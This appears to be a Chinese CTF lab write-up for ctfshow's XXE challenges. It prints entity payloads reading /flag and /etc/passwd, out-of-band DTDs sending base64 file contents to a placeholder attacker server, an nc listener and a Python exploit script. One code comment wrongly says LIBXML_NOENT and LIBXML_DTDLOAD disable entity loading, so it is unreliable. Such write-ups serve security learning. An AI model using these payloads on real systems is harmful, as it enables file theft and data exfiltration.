ctfshow web入门 XXE漏洞

已于 2024-07-19 12:19:12 修改
阅读量193 收藏
点赞数 2
分类专栏: ctfshow 文章标签: xml web安全 经验分享
于 2024-05-20 12:51:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/138867304
版权

web373

<?php
error_reporting(0);
libxml_disable_entity_loader(false);//启用外部实体加载器
$xmlfile = file_get_contents('php://input');//输入流等会payload我们用POST传参
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    使用 loadXML 方法加载 XML 数据到 DOM 文档对象 $dom 中。加载过程中使用了 LIBXML_NOENTLIBXML_DTDLOAD 参数,这些参数用于禁止实体扩展和加载外部的 DTD 文件,以提高安全性。
    $creds = simplexml_import_dom($dom);//将对象转为SimpleXMLElement 对象
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__); 

<!DOCTYPE test [  
<!ENTITY xxe SYSTEM "file:///flag">    
]>
<baozongwi>   
	<ctfshow>
		&xxe;
	</ctfshow>  
</baozongwi>

web374–web376

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
这里比上题少两句没有转化为SimpleXMLElement 对象所以也没有赋值

test.dtd:

<!ENTITY % dtd "<!ENTITY &#x25;xxe SYSTEM 'http://xxx:9999/%file;'> ">
%dtd;
%xxe;

<!DOCTYPE test[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % aaa SYSTEM "http://xxx(你的服务器)/test.dtd">
%aaa;
]>
<root>
	123
</root>

test:dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://xxx:9999/?x=%file;'>">
%eval;
%exfiltrate;

<?xml  version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://xxx/test.dtd">%xxe;]>
<root><ctfshow>&xxe;</ctfshow></root>

服务器开始监听

nc -lvp 9999

web377

import requests

# 目标URL
url = 'https://9afc298f-29cf-44ab-b8a4-7f6d66f67905.challenge.ctf.show/'

# XML实体注入的payload,已转换为UTF-16编码
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxxx/test.dtd">
%aaa;
]>
<root>123</root>""".encode('utf-16')

# 发送POST请求,注意:verify=False关闭了SSL验证,仅在测试环境下使用!
response = requests.post(url, data=payload, verify=False)

test.dtd:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://xxxx:9999/?x=%file;'>">
%eval;
%exfiltrate;

nc -lvp 9999    //服务器监听

web378

在这里插入图片描述
登录成功但是没有回显,抓包

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

抓包发现码,改包

type: "POST",
        url: "doLogin",
        contentType: "application/xml;charset=utf-8",

POST传参:
<!DOCTYPE test[
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe;
</username>
<password>
&xxe;
</password>
</user>
baozongwi
关注
专栏目录
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XMLXXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
XXE漏洞CTF题目
m0_62725813的博客
12-09 713
典型的XXE攻击是由XML声明:<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害:XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体,这个实体是通过system命令访问1.txt构造payload>//XML声明">]>
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2596
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
XXE漏洞(ctfshow-xxe)
unexpectedthing的博客
10-29 1058
文章目录XEE漏洞的原理ctfshow-xxeweb373web374,375,376web377web378 XEE漏洞的原理 XML外部实体注入 ctfshow-xxe web373 代码 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我们需要post我们的payload $xmlfile = file_get_contents('php://inp
pikachu之XXE漏洞
weixin_46062722的博客
02-25 685
漏洞介绍 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里
CTFxxe
qq_37410729的博客
10-26 1857
xxe漏洞即我们可以进行外部实体注入,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 两个writeup 第一题: bp抓包 然后就可以进行xml注入了 这是两种xxe,我们先试第二种(因为源代码并没有标注flag在什么文件中) 然后进内网 然而并进不去,那就只能找存活主机了。 直接暴力寻找 第二题: 按照上题的思路走 但是并没有找到flag。。。。 最后只能去文件里找了,但是题目没有标明具体flag在那个文件,只能试一下/flag文
ctfshow web 入门xxe
08-23
要利用XXE漏洞进行ctfshow的Web入门,可以构造一个恶意的XML实体,例如: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test> <ctfshow>&xxe;</ctfshow&gt...
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
初识XXE漏洞ctfshow做题(373-378)
最新发布
m0_74402888的博客
07-18 764
XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。// 注意:由于file_get_contents('php://input')在失败时会返回false或空字符串,ELEMENT foo ANY > <!// 使用file_get_contents函数从'php://input'流中读取原始POST数据。
XXE漏洞详解
Jeromeyoung
01-28 6638
文章目录XXE漏洞1、造成XXE的原因2、定义3、利用漏洞条件4、XXE使用5、XXE挖掘及扩展1、抓包看accept头是否接受xml2、抓包修改数据类型,把json改成xml来传输数据5、DTD基础知识构建xxe的payload达成攻击使用DTD实体的攻击方式DTD 实体声明:1. 内部实体声明2. 外部实体声明3. 参数实体声明4. 引用公共实体6、实体类别介绍总结7、XXE攻击类别及实例有回显无回显整个调用过程: XXE漏洞 利用数据格式造成攻击 1、造成XXE的原因 运维人员使用了低版本php,l
ctfshow web入门 XXE
2301_79442654的博客
03-30 865
XXEXML External Entity)攻击是一种针对XML处理漏洞的网络安全攻击手段。攻击者利用应用程序在解析XML输入时的漏洞,构造恶意的XML数据,进而实现各种恶意目的。所以要学习xxe就需要了解xml
web-ctfctf-pikachu-xxe
一个努力生活的人的博客
08-23 278
ctf-pikachu-xxe
XXE漏洞初解
LS_Sy的博客
03-29 984
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
XXE漏洞知识及ctfshow例题
2302_80044238的博客
03-29 1205
XXE全称为XML Enternal Entity Injection 中文叫xml外部实体注入简单了解XML:(xml和html的区别可以简易的理解成:xml是用来储存数据和传输数据的而html是用来将数据展现出来)XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 语法:XML元素都必须有
XXE漏洞原理与利用练习
0xcc'Blog
05-30 1360
XXE -"xml external entity injection(外部实体注入)" 如果在XML中允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 一段XML语言: DTD: DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。它使用一系列的合法元素来定义文档结构。 <?xml version = "1.0...
一道CTF针对XXE漏洞的练习
bamanju0574的博客
08-18 2200
题目链接:http://web.jarvisoj.com:9882/ 目的很明确获取/home/ctf/flag.txt的内容 一般读取目标机的本地文件都会用到file协议。 思路: 那么思路一:文件包含; 思路二:ssrf漏洞,这个成功率不大; 思路三:xxe漏洞,再没看源码的情况下试了一下,发现可以。 验证: 访问题目链接 随便输入,输入url发现都没有什么...
记录遇到的有趣的CTF题---simple_api(xxe漏洞)
tothemoon的博客
11-05 2158
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值